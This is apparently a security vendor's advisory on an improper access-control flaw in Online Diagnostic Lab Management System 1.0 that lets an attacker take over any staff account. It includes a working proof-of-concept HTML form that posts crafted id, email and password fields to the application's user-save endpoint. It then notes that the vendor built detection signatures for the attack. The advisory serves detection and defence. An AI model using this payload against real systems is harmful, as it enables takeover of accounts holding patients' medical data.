top of page

Online Diagnostic Lab Management System 1.0 - Account Takeover

Application Details

Online Diagnostic Lab Management System is a web-based application that serves as an online platform for diagnostic labs to manage their patient laboratory tests. The system also allows patients to book an appointment. The medical testing labs can use the system to manage all appointments, and patient test results.


Online Diagnostic Lab Management System could allow a remote attacker to bypass security restrictions, caused by improper access control.


By sending a specially crafted request using the 'id', 'email', 'password' and 'cpass' parameters, an attacker could exploit this vulnerability to takeover any registered staff user account.

<form action="http://localhost/odlms/classes/Users.php?f=save_client" method="post" enctype="multipart/form-data">
<input type="hidden" name="id" value="2" />
<input type="hidden" name="firstname" value="Claire" />
<input type="hidden" name="middlename" value="C" />
<input type="hidden" name="lastname" value="Blake" />
<input type="hidden" name="gender" value="Female" />
<input type="hidden" name="dob" value="1997-10-14" />
<input type="hidden" name="contact" value="09456789123" />
<input type="hidden" name="address" value="Sample Address only" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="password" value="test@1234" />
<input type="hidden" name="cpass" value="test@1234" />
<input value="Submit" type="Submit">


By turning this into a traffic file and matching rule, we are able to detect attempts to bypass security restrictions by influencing the vulnerable parameters.


Idappcom has created signatures 8022351 and 8022352 along with corresponding traffic files.


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here:


bottom of page